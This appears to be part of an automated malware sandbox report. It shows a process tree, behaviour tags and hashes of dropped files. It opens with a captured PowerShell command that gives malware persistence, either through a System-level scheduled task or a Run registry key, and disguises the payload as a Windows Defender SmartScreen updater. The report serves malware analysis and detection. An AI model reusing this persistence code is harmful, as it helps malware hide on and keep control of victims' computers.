C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kryoeujoq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenMachine' /tr '''C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenMachine' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenMachine" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenMachine /tr "'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe'"3⤵
- Creates scheduled task(s)
PID:320
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:988
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1168
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:484
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5bcaae53dc3d930c6ed4642e945fab93d
SHA1ba3391fb65a312431432dc2339abadce73c0d81a
SHA2566314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368
SHA5129d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5
-
Filesize
1.4MB
MD5bcaae53dc3d930c6ed4642e945fab93d
SHA1ba3391fb65a312431432dc2339abadce73c0d81a
SHA2566314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368
SHA5129d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5
-
Filesize
1.4MB
MD5bcaae53dc3d930c6ed4642e945fab93d
SHA1ba3391fb65a312431432dc2339abadce73c0d81a
SHA2566314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368
SHA5129d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5
-
Filesize
3.7MB
MD5619c8d3ebd09bd86a6faa527354e08d5
SHA1315b4f87c419a3ff24c62951c59e8089150846eb
SHA2563827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45
SHA5125aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a
-
Filesize
3.7MB
MD5619c8d3ebd09bd86a6faa527354e08d5
SHA1315b4f87c419a3ff24c62951c59e8089150846eb
SHA2563827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45
SHA5125aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
71KB
MD5dfeffc3924409d9c9d3c8cae05be922b
SHA1a89046cbf54c00e17ff0a5f3e1a8f01eb399bce4
SHA25606ea3ad1c1c1067bfdfaa5ad8a91632fac6cad9776ded85fa65d3b6181d89be6
SHA512d9614ecf528a2bf48cafe99a4c54d5c9f3656d628001fbf575d367d5ad8008cf30a58a7b3d9489d8534064442df89a7263df4a91d0863dcd6cc33574c576da33
-
Filesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
Filesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57f0f1f4a6c4615c7d2067c2854d524cb
SHA1e99514e8cd534aecb7934697a777dc26050ebb2a
SHA256afea990267453690783e32a212ed54b89f09e5308a70b78ecf470988316ca042
SHA512411d27730e65eb1f7a7ad2f2e91a1bfac0590fa1e9ad4a1b7f2da7b1ee7de185129a99629df64d0861784fc1c02847923c2ac66504456e30a8ad578ddfc30bdb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PMTGFZ9PPFWF4RGGDXAH.temp
Filesize7KB
MD57f0f1f4a6c4615c7d2067c2854d524cb
SHA1e99514e8cd534aecb7934697a777dc26050ebb2a
SHA256afea990267453690783e32a212ed54b89f09e5308a70b78ecf470988316ca042
SHA512411d27730e65eb1f7a7ad2f2e91a1bfac0590fa1e9ad4a1b7f2da7b1ee7de185129a99629df64d0861784fc1c02847923c2ac66504456e30a8ad578ddfc30bdb
-
Filesize
3KB
MD50d849dbfd28dbe08073aee761e7c20e5
SHA161889592646295199986f57ca5ebb57c6b836b19
SHA2569efd53f8c25bcd73814fd0d4c39c7726edf3bc98060e125184d7816ec74702e3
SHA5123c4bcec5088918fefb101d6d998a6c3d1d808491a7a43718f346d3d76aeb972b2f8db689233583ca459b03a2d248407c39123db1832efec02ece46f2a19eed44
-
Filesize
1.4MB
MD5bcaae53dc3d930c6ed4642e945fab93d
SHA1ba3391fb65a312431432dc2339abadce73c0d81a
SHA2566314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368
SHA5129d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5
-
Filesize
1.4MB
MD5bcaae53dc3d930c6ed4642e945fab93d
SHA1ba3391fb65a312431432dc2339abadce73c0d81a
SHA2566314f08fdcfb8983ddfb8aa7ef8b3b323748b68aead42263c1ae1fec17320368
SHA5129d7fc038d0cc746b2149359df62751110e0c49d33fed4bd286921e357306a1977cd57954104c545d96e61f36fe96df1e69c137f2d22ac9413eca08018316a9f5
-
Filesize
3.7MB
MD5619c8d3ebd09bd86a6faa527354e08d5
SHA1315b4f87c419a3ff24c62951c59e8089150846eb
SHA2563827b2d39eb48088817b350a6a2ed9b1de9c1a4d5f33bfab0bec1ecff99aeb45
SHA5125aa18e678d396e636a53f3b86542af058c819de58fe8bec6daa883f3ce382c21ad085f0dfc130b992e07a9dd0086ff62c8e2fe69c6b81f8f1506183367e7337a
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
Filesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774